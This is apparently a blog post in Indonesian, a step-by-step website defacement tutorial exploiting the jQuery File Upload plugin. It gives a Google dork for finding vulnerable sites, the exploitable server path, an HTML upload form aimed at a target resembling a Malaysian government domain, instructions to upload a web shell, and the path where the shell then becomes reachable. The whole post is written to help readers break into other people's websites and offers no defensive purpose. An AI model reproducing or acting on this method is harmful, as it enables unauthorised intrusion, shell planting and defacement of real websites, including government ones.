[Update] Tutorial Deface Dengan Jquery File Upload full Tutorial 2020
Saturday, 10 December 2016
Edit
Okee kali ini saya akan share tutorial Deface Method Jquery File File Upload
Alat Alat :
Alat Alat :
- Default Google Dork :/assets/global/plugins/jquery-file-upload/ site: *Kembangin lagi biar joss
- Exploit: http://targetcrotz.com/assets/global/plugins/jquery-file-upload/server/php/ atau http://target/[patch]/assets/global/plugins/jquery-file-upload/server/php/
- Script CSRF: Save dengan .html
<form method="POST" action="http://target.gov.my/public/templates/skin/plugins/jquery-file-upload/server/php/"enctype="multipart/form-data"><input type="file" name="files[]" /><button>Upload</button></
- Shell : Pakek shell andalan kalian..
- Masukan dork di atas atau dork yang sudah ente kembangin,pilih target lalu masukan exploitnya,jika vuln maka ada tulisan seperti ini: {"files":[{}] Atau {"files":[{blablablablba}]
- Masukan target anda ke script CSRF tadi
- Upload shell anda jika berhasil ada tampilan seperti ini:
- Akses shell ada di : http://targetcrotz.gov.my/assets/gobal/plugins/jquery-file-upload/server/php/files/namashellmu.php
Okee Sekian dari saya , semoga bermanfaat.. Terimakasih..